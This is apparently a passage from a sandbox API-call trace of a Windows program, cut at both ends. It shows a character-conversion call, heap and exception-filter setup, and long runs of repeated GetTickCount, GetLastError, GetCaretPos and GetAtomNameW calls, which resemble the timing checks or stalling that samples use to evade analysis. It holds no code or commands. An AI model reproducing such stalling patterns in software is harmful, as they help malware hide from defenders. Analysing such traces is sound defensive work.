¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿP¤\x09À\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0183.792] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x80) returned 0x231c28 [0183.792] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40636c) returned 0x0 [0183.793] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x231c28) returned 0x80 [0183.793] GetTickCount () returned 0x113343b [0183.793] GetLastError () returned 0x0 [0183.794] GetTickCount () returned 0x113343b [0183.794] GetLastError () returned 0x0 [0183.794] GetTickCount () returned 0x113343b [0183.794] GetLastError () returned 0x0 [0183.794] GetTickCount () returned 0x113343b [0183.794] GetLastError () returned 0x0 [0183.794] GetTickCount () returned 0x113343b [0183.794] GetLastError () returned 0x0 [0183.794] GetTickCount () returned 0x113343b [0183.794] GetLastError () returned 0x0 [0183.795] GetTickCount () returned 0x113344a [0183.795] GetLastError () returned 0x0 [0183.795] GetTickCount () returned 0x113344a [0183.795] GetLastError () returned 0x0 [0183.795] GetTickCount () returned 0x113344a [0183.795] GetLastError () returned 0x0 [0183.795] GetTickCount () returned 0x113344a [0183.795] GetLastError () returned 0x0 [0183.795] GetTickCount () returned 0x113344a [0183.795] GetLastError () returned 0x0 [0183.795] GetTickCount () returned 0x113344a [0183.795] GetLastError () returned 0x0 [0183.795] GetTickCount () returned 0x113344a [0183.795] GetLastError () returned 0x0 [0183.795] GetTickCount () returned 0x113344a [0183.795] GetLastError () returned 0x0 [0183.795] GetTickCount () returned 0x113344a [0183.795] GetLastError () returned 0x0 [0183.795] GetTickCount () returned 0x113344a [0183.795] GetLastError () returned 0x0 [0183.795] GetTickCount () returned 0x113344a [0183.795] GetLastError () returned 0x0 [0183.795] GetTickCount () returned 0x113344a [0183.795] GetLastError () returned 0x0 [0183.795] GetTickCount () returned 0x113344a [0183.795] GetLastError () returned 0x0 [0183.795] GetTickCount () returned 0x113344a [0183.795] GetLastError () returned 0x0 [0183.795] GetTickCount () returned 0x113344a [0183.795] GetLastError () returned 0x0 [0183.795] GetTickCount () returned 0x113344a [0183.795] GetLastError () returned 0x0 [0183.795] GetTickCount () returned 0x113344a [0183.796] GetLastError () returned 0x0 [0183.796] GetTickCount () returned 0x113344a [0183.796] GetLastError () returned 0x0 [0183.796] GetTickCount () returned 0x113344a [0183.796] GetLastError () returned 0x0 [0183.796] GetTickCount () returned 0x113344a [0183.796] GetLastError () returned 0x0 [0183.796] GetTickCount () returned 0x113344a [0183.796] GetLastError () returned 0x0 [0183.796] GetTickCount () returned 0x113344a [0183.796] GetLastError () returned 0x0 [0183.796] GetTickCount () returned 0x113344a [0183.796] GetLastError () returned 0x0 [0183.796] GetTickCount () returned 0x113344a [0183.796] GetLastError () returned 0x0 [0183.796] GetTickCount () returned 0x113344a [0183.796] GetLastError () returned 0x0 [0183.797] GetTickCount () returned 0x113344a [0183.797] GetLastError () returned 0x0 [0183.797] GetTickCount () returned 0x113344a [0183.797] GetLastError () returned 0x0 [0183.797] GetTickCount () returned 0x113344a [0183.797] GetLastError () returned 0x0 [0183.797] GetTickCount () returned 0x113344a [0183.797] GetLastError () returned 0x0 [0183.797] GetTickCount () returned 0x113344a [0183.797] GetLastError () returned 0x0 [0183.797] GetTickCount () returned 0x113344a [0183.797] GetLastError () returned 0x0 [0183.797] GetTickCount () returned 0x113344a [0183.797] GetLastError () returned 0x0 [0183.797] GetTickCount () returned 0x113344a [0183.797] GetLastError () returned 0x0 [0183.797] GetTickCount () returned 0x113344a [0183.797] GetLastError () returned 0x0 [0183.797] GetTickCount () returned 0x113344a [0183.797] GetLastError () returned 0x0 [0183.797] GetTickCount () returned 0x113344a [0183.797] GetLastError () returned 0x0 [0183.797] GetTickCount () returned 0x113344a [0183.797] GetLastError () returned 0x0 [0183.797] GetTickCount () returned 0x113344a [0183.797] GetLastError () returned 0x0 [0183.797] GetTickCount () returned 0x113344a [0183.797] GetLastError () returned 0x0 [0183.797] GetTickCount () returned 0x113344a [0183.797] GetLastError () returned 0x0 [0183.797] GetTickCount () returned 0x113344a [0183.797] GetLastError () returned 0x0 [0183.797] GetTickCount () returned 0x113344a [0183.797] GetLastError () returned 0x0 [0183.798] GetTickCount () returned 0x113344a [0183.798] GetLastError () returned 0x0 [0183.798] GetTickCount () returned 0x113344a [0183.798] GetLastError () returned 0x0 [0183.798] GetTickCount () returned 0x113344a [0183.798] GetLastError () returned 0x0 [0183.798] GetTickCount () returned 0x113344a [0183.798] GetLastError () returned 0x0 [0183.798] GetTickCount () returned 0x113344a [0183.798] GetLastError () returned 0x0 [0183.798] GetTickCount () returned 0x113344a [0183.798] GetLastError () returned 0x0 [0183.798] GetTickCount () returned 0x113344a [0183.798] GetLastError () returned 0x0 [0183.798] GetTickCount () returned 0x113344a [0183.798] GetLastError () returned 0x0 [0183.798] GetTickCount () returned 0x113344a [0183.798] GetLastError () returned 0x0 [0183.798] GetTickCount () returned 0x113344a [0183.798] GetLastError () returned 0x0 [0183.798] GetTickCount () returned 0x113344a [0183.798] GetLastError () returned 0x0 [0183.798] GetTickCount () returned 0x113344a [0183.798] GetLastError () returned 0x0 [0183.798] GetTickCount () returned 0x113344a [0183.798] GetLastError () returned 0x0 [0183.798] GetTickCount () returned 0x113344a [0183.798] GetLastError () returned 0x0 [0183.798] GetTickCount () returned 0x113344a [0183.798] GetLastError () returned 0x0 [0183.798] GetTickCount () returned 0x113344a [0183.798] GetLastError () returned 0x0 [0183.798] GetTickCount () returned 0x113344a [0183.798] GetLastError () returned 0x0 [0183.799] GetTickCount () returned 0x113344a [0183.799] GetLastError () returned 0x0 [0183.799] GetTickCount () returned 0x113344a [0183.799] GetLastError () returned 0x0 [0183.799] GetTickCount () returned 0x113344a [0183.799] GetLastError () returned 0x0 [0183.799] GetTickCount () returned 0x113344a [0183.799] GetLastError () returned 0x0 [0183.799] GetTickCount () returned 0x113344a [0183.799] GetLastError () returned 0x0 [0183.799] GetTickCount () returned 0x113344a [0183.799] GetLastError () returned 0x0 [0183.799] GetTickCount () returned 0x113344a [0183.799] GetLastError () returned 0x0 [0183.799] GetTickCount () returned 0x113344a [0183.799] GetLastError () returned 0x0 [0183.799] GetTickCount () returned 0x113344a [0183.799] GetLastError () returned 0x0 [0183.799] GetTickCount () returned 0x113344a [0183.799] GetLastError () returned 0x0 [0183.799] GetTickCount () returned 0x113344a [0183.799] GetLastError () returned 0x0 [0183.799] GetTickCount () returned 0x113344a [0183.799] GetLastError () returned 0x0 [0183.799] GetTickCount () returned 0x113344a [0183.799] GetLastError () returned 0x0 [0183.799] GetTickCount () returned 0x113344a [0183.799] GetLastError () returned 0x0 [0183.799] GetTickCount () returned 0x113344a [0183.799] GetLastError () returned 0x0 [0183.799] GetTickCount () returned 0x113344a [0183.799] GetLastError () returned 0x0 [0183.799] GetTickCount () returned 0x113344a [0183.800] GetLastError () returned 0x0 [0183.800] GetTickCount () returned 0x113344a [0183.800] GetLastError () returned 0x0 [0183.800] GetTickCount () returned 0x113344a [0183.800] GetLastError () returned 0x0 [0183.800] GetTickCount () returned 0x113344a [0183.800] GetLastError () returned 0x0 [0183.800] GetTickCount () returned 0x113344a [0183.800] GetLastError () returned 0x0 [0183.800] GetTickCount () returned 0x113344a [0183.800] GetLastError () returned 0x0 [0183.800] GetTickCount () returned 0x113344a [0183.800] GetLastError () returned 0x0 [0183.800] GetTickCount () returned 0x113344a [0183.800] GetLastError () returned 0x0 [0183.800] GetTickCount () returned 0x113344a [0183.800] GetLastError () returned 0x0 [0183.800] GetTickCount () returned 0x113344a [0183.800] GetLastError () returned 0x0 [0183.800] GetTickCount () returned 0x113344a [0183.800] GetLastError () returned 0x0 [0183.800] GetTickCount () returned 0x113344a [0183.800] GetLastError () returned 0x0 [0183.800] GetTickCount () returned 0x113344a [0183.800] GetLastError () returned 0x0 [0183.800] GetTickCount () returned 0x113344a [0183.800] GetLastError () returned 0x0 [0183.800] GetTickCount () returned 0x113344a [0183.800] GetLastError () returned 0x0 [0183.800] GetTickCount () returned 0x113344a [0183.800] GetLastError () returned 0x0 [0183.800] GetTickCount () returned 0x113344a [0183.800] GetLastError () returned 0x0 [0183.800] GetTickCount () returned 0x113344a [0183.801] GetLastError () returned 0x0 [0183.801] GetTickCount () returned 0x113344a [0183.801] GetLastError () returned 0x0 [0183.801] GetTickCount () returned 0x113344a [0183.801] GetLastError () returned 0x0 [0183.801] GetTickCount () returned 0x113344a [0183.801] GetLastError () returned 0x0 [0183.801] GetTickCount () returned 0x113344a [0183.801] GetLastError () returned 0x0 [0183.801] GetTickCount () returned 0x113344a [0183.801] GetLastError () returned 0x0 [0183.801] GetTickCount () returned 0x113344a [0183.801] GetLastError () returned 0x0 [0183.801] GetTickCount () returned 0x113344a [0183.801] GetLastError () returned 0x0 [0183.801] GetTickCount () returned 0x113344a [0183.801] GetLastError () returned 0x0 [0183.801] GetTickCount () returned 0x113344a [0183.801] GetLastError () returned 0x0 [0183.801] GetTickCount () returned 0x113344a [0183.801] GetLastError () returned 0x0 [0183.801] GetTickCount () returned 0x113344a [0183.801] GetLastError () returned 0x0 [0183.801] GetTickCount () returned 0x113344a [0183.801] GetLastError () returned 0x0 [0183.801] GetTickCount () returned 0x113344a [0183.801] GetLastError () returned 0x0 [0183.801] GetTickCount () returned 0x113344a [0183.801] GetLastError () returned 0x0 [0183.801] GetTickCount () returned 0x113344a [0183.801] GetLastError () returned 0x0 [0183.801] GetTickCount () returned 0x113344a [0183.801] GetLastError () returned 0x0 [0183.801] GetTickCount () returned 0x113344a [0183.802] GetLastError () returned 0x0 [0183.802] GetTickCount () returned 0x113344a [0183.802] GetLastError () returned 0x0 [0183.802] GetTickCount () returned 0x113344a [0183.802] GetLastError () returned 0x0 [0183.802] GetTickCount () returned 0x113344a [0183.802] GetLastError () returned 0x0 [0183.802] GetTickCount () returned 0x113344a [0183.802] GetLastError () returned 0x0 [0183.802] GetTickCount () returned 0x113344a [0183.802] GetLastError () returned 0x0 [0183.802] GetTickCount () returned 0x113344a [0183.802] GetLastError () returned 0x0 [0183.802] GetTickCount () returned 0x113344a [0183.802] GetLastError () returned 0x0 [0183.802] GetTickCount () returned 0x113344a [0183.802] GetLastError () returned 0x0 [0183.802] GetTickCount () returned 0x113344a [0183.802] GetLastError () returned 0x0 [0183.802] GetTickCount () returned 0x113344a [0183.802] GetLastError () returned 0x0 [0183.802] GetTickCount () returned 0x113344a [0183.802] GetLastError () returned 0x0 [0183.802] GetTickCount () returned 0x113344a [0183.802] GetLastError () returned 0x0 [0183.802] GetTickCount () returned 0x113344a [0183.802] GetLastError () returned 0x0 [0183.802] GetTickCount () returned 0x113344a [0183.802] GetLastError () returned 0x0 [0183.802] GetTickCount () returned 0x113344a [0183.802] GetLastError () returned 0x0 [0183.802] GetTickCount () returned 0x113344a [0183.802] GetLastError () returned 0x0 [0183.802] GetTickCount () returned 0x113344a [0183.802] GetLastError () returned 0x0 [0183.802] GetTickCount () returned 0x113344a [0183.802] GetLastError () returned 0x0 [0183.802] GetTickCount () returned 0x113344a [0183.802] GetLastError () returned 0x0 [0183.802] GetTickCount () returned 0x113344a [0183.802] GetLastError () returned 0x0 [0183.802] GetTickCount () returned 0x113344a [0183.803] GetLastError () returned 0x0 [0183.803] GetTickCount () returned 0x113344a [0183.803] GetLastError () returned 0x0 [0183.803] GetTickCount () returned 0x113344a [0183.803] GetLastError () returned 0x0 [0183.803] GetTickCount () returned 0x113344a [0183.803] GetLastError () returned 0x0 [0183.803] GetTickCount () returned 0x113344a [0183.803] GetLastError () returned 0x0 [0183.803] GetTickCount () returned 0x113344a [0183.803] GetLastError () returned 0x0 [0183.803] GetTickCount () returned 0x113344a [0183.803] GetLastError () returned 0x0 [0183.803] GetTickCount () returned 0x113344a [0183.803] GetLastError () returned 0x0 [0183.803] GetTickCount () returned 0x113344a [0183.803] GetLastError () returned 0x0 [0183.803] GetTickCount () returned 0x113344a [0183.803] GetLastError () returned 0x0 [0183.803] GetTickCount () returned 0x113344a [0183.803] GetLastError () returned 0x0 [0183.803] GetTickCount () returned 0x113344a [0183.803] GetLastError () returned 0x0 [0183.803] GetTickCount () returned 0x113344a [0183.803] GetLastError () returned 0x0 [0183.803] GetTickCount () returned 0x113344a [0183.803] GetLastError () returned 0x0 [0183.803] GetTickCount () returned 0x113344a [0183.803] GetLastError () returned 0x0 [0183.803] GetTickCount () returned 0x113344a [0183.803] GetLastError () returned 0x0 [0183.803] GetTickCount () returned 0x113344a [0183.803] GetLastError () returned 0x0 [0183.803] GetTickCount () returned 0x113344a [0183.803] GetLastError () returned 0x0 [0183.804] GetTickCount () returned 0x113344a [0183.804] GetLastError () returned 0x0 [0183.804] GetTickCount () returned 0x113344a [0183.804] GetLastError () returned 0x0 [0183.804] GetTickCount () returned 0x113344a [0183.804] GetLastError () returned 0x0 [0183.804] GetTickCount () returned 0x113344a [0183.804] GetLastError () returned 0x0 [0183.804] GetTickCount () returned 0x113344a [0183.804] GetLastError () returned 0x0 [0183.804] GetTickCount () returned 0x113344a [0183.804] GetLastError () returned 0x0 [0183.804] GetTickCount () returned 0x113344a [0183.804] GetLastError () returned 0x0 [0183.804] GetTickCount () returned 0x113344a [0183.804] GetLastError () returned 0x0 [0183.804] GetTickCount () returned 0x113344a [0183.804] GetLastError () returned 0x0 [0183.804] GetTickCount () returned 0x113344a [0183.804] GetLastError () returned 0x0 [0183.804] GetTickCount () returned 0x113344a [0183.804] GetLastError () returned 0x0 [0183.804] GetTickCount () returned 0x113344a [0183.804] GetLastError () returned 0x0 [0183.804] GetTickCount () returned 0x113344a [0183.804] GetLastError () returned 0x0 [0183.804] GetTickCount () returned 0x113344a [0183.804] GetLastError () returned 0x0 [0183.804] GetTickCount () returned 0x113344a [0183.804] GetLastError () returned 0x0 [0183.804] GetTickCount () returned 0x113344a [0183.804] GetLastError () returned 0x0 [0183.804] GetTickCount () returned 0x113344a [0183.805] GetLastError () returned 0x0 [0183.805] GetTickCount () returned 0x113344a [0183.805] GetLastError () returned 0x0 [0183.805] GetTickCount () returned 0x113344a [0183.805] GetLastError () returned 0x0 [0183.805] GetTickCount () returned 0x113344a [0183.805] GetLastError () returned 0x0 [0183.805] GetTickCount () returned 0x113344a [0183.805] GetLastError () returned 0x0 [0183.805] GetTickCount () returned 0x113344a [0183.805] GetLastError () returned 0x0 [0183.805] GetTickCount () returned 0x113344a [0183.805] GetLastError () returned 0x0 [0183.805] GetTickCount () returned 0x113344a [0183.805] GetLastError () returned 0x0 [0183.805] GetTickCount () returned 0x113344a [0183.805] GetLastError () returned 0x0 [0183.805] GetTickCount () returned 0x113344a [0183.805] GetLastError () returned 0x0 [0183.805] GetTickCount () returned 0x113344a [0183.805] GetLastError () returned 0x0 [0183.805] GetTickCount () returned 0x113344a [0183.805] GetLastError () returned 0x0 [0183.805] GetTickCount () returned 0x113344a [0183.805] GetLastError () returned 0x0 [0183.805] GetTickCount () returned 0x113344a [0183.805] GetLastError () returned 0x0 [0183.805] GetTickCount () returned 0x113344a [0183.805] GetLastError () returned 0x0 [0183.805] GetTickCount () returned 0x113344a [0183.805] GetLastError () returned 0x0 [0183.805] GetTickCount () returned 0x113344a [0183.805] GetLastError () returned 0x0 [0183.805] GetTickCount () returned 0x113344a [0183.805] GetLastError () returned 0x0 [0183.806] GetTickCount () returned 0x113344a [0183.806] GetLastError () returned 0x0 [0183.806] GetTickCount () returned 0x113344a [0183.806] GetLastError () returned 0x0 [0183.806] GetTickCount () returned 0x113344a [0183.806] GetLastError () returned 0x0 [0183.806] GetTickCount () returned 0x113344a [0183.806] GetLastError () returned 0x0 [0183.806] GetTickCount () returned 0x113344a [0183.806] GetLastError () returned 0x0 [0183.806] GetTickCount () returned 0x113344a [0183.806] GetLastError () returned 0x0 [0183.806] GetTickCount () returned 0x113344a [0183.806] GetLastError () returned 0x0 [0183.806] GetTickCount () returned 0x113344a [0183.806] GetLastError () returned 0x0 [0183.806] GetTickCount () returned 0x113344a [0183.806] GetLastError () returned 0x0 [0183.806] GetTickCount () returned 0x113344a [0183.806] GetLastError () returned 0x0 [0183.806] GetTickCount () returned 0x113344a [0183.806] GetLastError () returned 0x0 [0183.806] GetTickCount () returned 0x113344a [0183.806] GetLastError () returned 0x0 [0183.806] GetTickCount () returned 0x113344a [0183.806] GetLastError () returned 0x0 [0183.806] GetTickCount () returned 0x113344a [0183.806] GetLastError () returned 0x0 [0183.806] GetTickCount () returned 0x113344a [0183.806] GetLastError () returned 0x0 [0183.806] GetTickCount () returned 0x113344a [0183.806] GetLastError () returned 0x0 [0183.807] GetTickCount () returned 0x113344a [0183.807] GetLastError () returned 0x0 [0183.807] GetTickCount () returned 0x113344a [0183.807] GetLastError () returned 0x0 [0183.807] GetTickCount () returned 0x113344a [0183.807] GetLastError () returned 0x0 [0183.807] GetTickCount () returned 0x113344a [0183.807] GetLastError () returned 0x0 [0183.807] GetTickCount () returned 0x113344a [0183.807] GetLastError () returned 0x0 [0183.807] GetTickCount () returned 0x113344a [0183.807] GetLastError () returned 0x0 [0183.807] GetTickCount () returned 0x113344a [0183.807] GetLastError () returned 0x0 [0183.807] GetTickCount () returned 0x113344a [0183.807] GetLastError () returned 0x0 [0183.807] GetTickCount () returned 0x113344a [0183.807] GetLastError () returned 0x0 [0183.807] GetTickCount () returned 0x113344a [0183.807] GetLastError () returned 0x0 [0183.807] GetTickCount () returned 0x113344a [0183.807] GetLastError () returned 0x0 [0183.807] GetTickCount () returned 0x113344a [0183.807] GetLastError () returned 0x0 [0183.807] GetTickCount () returned 0x113344a [0183.807] GetLastError () returned 0x0 [0183.807] GetTickCount () returned 0x113344a [0183.807] GetLastError () returned 0x0 [0183.807] GetTickCount () returned 0x113344a [0183.807] GetLastError () returned 0x0 [0183.807] GetTickCount () returned 0x113344a [0183.807] GetLastError () returned 0x0 [0183.807] GetTickCount () returned 0x113344a [0183.807] GetLastError () returned 0x0 [0183.807] GetTickCount () returned 0x113344a [0183.808] GetLastError () returned 0x0 [0183.808] GetTickCount () returned 0x113344a [0183.808] GetLastError () returned 0x0 [0183.808] GetTickCount () returned 0x113344a [0183.808] GetLastError () returned 0x0 [0183.808] GetTickCount () returned 0x113344a [0183.808] GetLastError () returned 0x0 [0183.808] GetTickCount () returned 0x113344a [0183.808] GetLastError () returned 0x0 [0183.808] GetTickCount () returned 0x113344a [0183.808] GetLastError () returned 0x0 [0183.808] GetTickCount () returned 0x113344a [0183.808] GetLastError () returned 0x0 [0183.808] GetTickCount () returned 0x113344a [0183.808] GetLastError () returned 0x0 [0183.808] GetTickCount () returned 0x113344a [0183.808] GetLastError () returned 0x0 [0183.808] GetTickCount () returned 0x113344a [0183.808] GetLastError () returned 0x0 [0183.808] GetTickCount () returned 0x113344a [0183.808] GetLastError () returned 0x0 [0183.808] GetTickCount () returned 0x113344a [0183.808] GetLastError () returned 0x0 [0183.808] GetTickCount () returned 0x113344a [0183.808] GetLastError () returned 0x0 [0183.808] GetTickCount () returned 0x113344a [0183.808] GetLastError () returned 0x0 [0183.808] GetTickCount () returned 0x113344a [0183.808] GetLastError () returned 0x0 [0183.808] GetTickCount () returned 0x113344a [0183.808] GetLastError () returned 0x0 [0183.808] GetTickCount () returned 0x113344a [0183.808] GetLastError () returned 0x0 [0183.809] GetTickCount () returned 0x113344a [0183.809] GetLastError () returned 0x0 [0183.809] GetTickCount () returned 0x113344a [0183.809] GetLastError () returned 0x0 [0183.809] GetTickCount () returned 0x113344a [0183.809] GetLastError () returned 0x0 [0183.809] GetTickCount () returned 0x113344a [0183.809] GetLastError () returned 0x0 [0183.809] GetTickCount () returned 0x113344a [0183.809] GetLastError () returned 0x0 [0183.809] GetTickCount () returned 0x113344a [0183.809] GetLastError () returned 0x0 [0183.809] GetTickCount () returned 0x113344a [0183.809] GetLastError () returned 0x0 [0183.809] GetTickCount () returned 0x113344a [0183.809] GetLastError () returned 0x0 [0183.809] GetTickCount () returned 0x113344a [0183.809] GetLastError () returned 0x0 [0183.809] GetTickCount () returned 0x113344a [0183.809] GetLastError () returned 0x0 [0183.809] GetTickCount () returned 0x113344a [0183.809] GetLastError () returned 0x0 [0184.189] lstrlenA (lpString="") returned 0 [0184.189] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.189] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.189] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.189] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.189] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.189] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.190] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.190] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.190] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.190] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.190] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.190] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.190] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.190] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.190] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.190] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.190] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.190] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.190] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.190] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.190] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.190] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.190] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.190] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.190] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.190] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.190] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.190] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.190] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.190] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.190] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.190] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.190] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.190] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.190] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.190] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.190] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.191] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.191] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.191] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.191] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.191] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.191] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.191] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.191] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.191] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.191] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.191] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.191] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.191] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.191] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.191] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.191] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.191] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.191] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.191] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.191] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 